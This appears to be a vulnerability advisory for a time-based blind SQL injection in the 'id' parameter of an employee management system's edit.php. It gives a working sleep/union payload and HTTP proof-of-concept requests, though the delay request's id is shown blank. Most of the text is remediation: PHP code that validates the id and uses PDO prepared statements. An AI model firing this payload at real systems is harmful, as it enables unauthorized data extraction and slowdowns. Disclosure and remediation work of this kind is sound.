# Vulnerability Summary: SQL Injection Vulnerability in EMPLOYEE_MANAGEMENT_SYSTEM

## Vulnerability Overview

* **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection)
* **Affected File**: `370project/edit.php`
* **Root Cause**: User-controllable input (the `id` parameter) is directly concatenated into SQL statements without parameterization.

## Impact Scope

* Inference or extraction of data using blind injection techniques.
* Bypassing expected query logic to access unauthorized records (depending on database privileges).
* Reduction of service availability by triggering expensive, time-consuming queries.

## Exploit Code (Payload)

```sql
(select*from(select+sleep(10)union/**/select+1)a)
```

## Proof of Concept (POC)

**1. Baseline Request:**

```http
GET /edit.php?id=101 HTTP/1.1
Host: 370project:82
Accept: text/html
Connection: close
```

**2. Time Delay Verification Request (URL-encoded Payload):**

```http
GET /edit.php?id= HTTP/1.1
Host: 370project:82
Accept: text/html
Connection: close
```

**Expected Result**: The second request should be approximately 10 seconds slower than the baseline request, indicating that the injected expression was executed on the database side.

## Remediation

* **Parameterized Queries**: Use prepared statements or parameterized queries instead of string concatenation.
* **Input Validation**: Perform strict type checking and filtering on input parameters.
* **Principle of Least Privilege**: Ensure database accounts possess only the minimum privileges required for their intended functions.
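The following is an added example showing how the first two remediation points apply to a lookup like the one in `edit.php`; it is not the project's own code. The table name `employees`, its columns, the DSN and the credentials are assumptions chosen for illustration, and the functions `parseEmployeeId` and `fetchEmployee` are hypothetical names. The `id` value is first validated as a positive integer and then bound as a typed parameter of a prepared statement, so a value such as the `sleep()`/`union` payload above is rejected before any query runs and, even if it reached the database, would be treated as data rather than SQL.

```php
<?php
// Added example (not the project's code): hardened id lookup for an edit page.
// Assumed schema: table `employees` with integer primary key `id`.
// The pattern this replaces is the one the advisory describes:
//   "SELECT ... WHERE id = " . $_GET['id']   (string concatenation, no binding)

declare(strict_types=1);

/**
 * Input validation: accept only a positive integer, nothing else.
 * FILTER_VALIDATE_INT rejects quotes, parentheses, whitespace and
 * comment sequences, so the injected expression never reaches SQL.
 */
function parseEmployeeId(?string $raw): ?int
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/**
 * Parameterized query: the id is bound with PDO::PARAM_INT, so the
 * database receives the statement and the value separately.
 */
function fetchEmployee(PDO $pdo, int $id): ?array
{
    $stmt = $pdo->prepare('SELECT id, name, department FROM employees WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hypothetical connection details; the account should hold only the
// privileges the page needs (least privilege), e.g. SELECT/UPDATE on `employees`.
$pdo = new PDO(
    'mysql:host=localhost;dbname=employee_db;charset=utf8mb4',
    'app_user',
    'app_password',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // use native server-side prepared statements
    ]
);

$id = parseEmployeeId($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    exit('Invalid employee id');
}

$employee = fetchEmployee($pdo, $id);
if ($employee === null) {
    http_response_code(404);
    exit('Employee not found');
}

// Output encoding on the way back out, independent of the SQL fix.
echo htmlspecialchars($employee['name'], ENT_QUOTES, 'UTF-8');
```

Disabling `PDO::ATTR_EMULATE_PREPARES` makes MySQL itself separate the statement text from the bound values; with emulation on, PDO still escapes the value client-side, but native prepares are the stronger default. A useful check after deploying such a change is to repeat the baseline and delay requests from the POC above: both should now return in roughly the same time, and the second should produce a 400 response rather than a database round-trip.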